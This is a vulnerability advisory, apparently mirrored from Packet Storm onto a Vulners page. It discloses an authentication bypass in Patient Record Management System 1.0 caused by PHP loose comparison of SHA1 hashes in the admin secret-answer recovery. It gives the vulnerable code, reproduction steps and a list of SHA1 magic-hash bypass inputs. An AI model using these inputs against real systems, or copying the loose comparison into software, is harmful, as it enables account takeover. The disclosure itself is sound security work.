Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Patient Record Management System 1.0 Authentication Bypass

🗓️ 20 Jan 2023 00:00:00Reported by Joe PollockType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 571 Views

Patient Record Management System v1.0 Authentication Bypass via PHP Loose Comparison. Vulnerability allows admin authentication bypass using SHA1 magic hash generated secret answers

Code
`# Exploit Title: Patient Record Management System v1.0 - Authentication Bypass via PHP Loose Comparison  
# Exploit Author: Joe Pollock  
# Date: January 19, 2023  
# Vendor Homepage: https://www.sourcecodester.com/php/13505/patient-record-management-system.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/patientrecords.zip  
# Tested on: Kali Linux, Apache, Mysql, PHP 8.1.5  
# CVE: T.B.C  
# Vendor: kimcey500  
# Version: 1.0  
# Exploit Description:  
# Patient Record Management System v1.0 implements a PHP loose comparison within the password recovery functionality (secret question/answer) of   
# the admin account, which renders the application vulnerable to an authentication bypass depending on the secret answer chosen by the administrator.   
# If the secret answer generates a SHA1 magic hash (SHA1 is the hashing format used by the application to store secret answers) then an authentication   
# bypass of the admin account is possible using any other SHA1 magic hash. The vulnerable function is found within User_model.php and is shown below:  
  
public function get_forgot_secret($login_id, $secans){  
$this->db->where('u_id', $login_id);  
$query = $this->db->get('users');  
$decrypt = $query->row()->u_secretanswer;  
if(sha1($secans) == $decrypt){ // md5 encryption   
return $query->row();  
}  
}   
  
========================================================  
(+) To reproduce this exploit:  
========================================================  
1. Log in as the administrator and navigate to the password recovery functionality (http://localhost/Indexcontrol/secretquestion).  
2. Enter the ‘Current Password’ then select any ‘Secret Question’.   
3. For the ‘Secret Answer’, use the following: 10932435112  
4. Confirm the ‘Secret Answer’ then click ‘Submit’. Now logout of the administrator account.  
5. From the admin login page, click ‘Forgot Password?’.  
6. Enter ‘admin’ as the username then click ‘Submit’.  
7. For the ‘Secret Answer’, use any of the following:  
  
aaroZmOk  
w9KASOk6Ikap  
aaO8zKZF  
aa3OFF9m  
w9KASOk6Ikap  
  
8. After clicking 'Submit, the 'create new password' functionality should be displayed and therefore authentication can be bypassed.  
  
========================================================  
(+) Explanation:  
========================================================  
Following from above, assume the administrator has chosen the following as their secret answer:   
  
10932435112  
  
The application then stores the SHA1 hash of the secret answer in the database. The stored hash is:   
  
0e07766915004133176347055865026311692244  
  
The above hash is an example of a 'magic hash', i.e. the hash starts with "0e" (or "0..0e") only followed by numbers.  
  
In PHP, if two strings are loosely compared (==) and match the regular expression 0+e[0-9]+, the result will be TRUE.  
  
It will then be possible to bypass the authentication of this account using any secret answer which generates a SHA1 magic hash.   
  
Any of the following secret answers could be used to bypass authentication:  
  
aaroZmOk  
w9KASOk6Ikap  
aaO8zKZF  
aa3OFF9m  
w9KASOk6Ikap  
  
See here for more examples that could be used: https://github.com/spaze/hashes/blob/master/sha1.md  
  
The comparision which would take place by the application in get_forgot_secret() is:  
  
if(sha1(aaroZmOk) == "0e07766915004133176347055865026311692244"){   
//Reset password  
  
Which becomes:  
  
if("0e66507019969427134894567494305185566735" == "0e07766915004133176347055865026311692244"){   
//Reset password  
  
Due to the loose comparision used (==), the above evaluates to TRUE, which would then allow the attacker to change  
the password of the account.  
  
You can try this yourself using the interactive PHP interpreter:  
  
var_dump(sha1('aaroZmOk') == "0e111");  
var_dump(sha1('aaroZmOk') == "0e222");  
var_dump(sha1('aaroZmOk') == sha1('w9KASOk6Ikap'));  
  
========================================================  
(+) References and more information  
========================================================  
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Type%20Juggling/README.md  
http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html  
https://www.whitehatsec.com/blog/magic-hashes/  
https://github.com/spaze/hashes  
https://offsec.almond.consulting/super-magic-hash.html  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Jan 2023 00:00Current
0.5Low risk
Vulners AI Score0.5
authentication bypassvulnerabilitysha1 magic hashpassword recoveryloose comparisonadmin account
571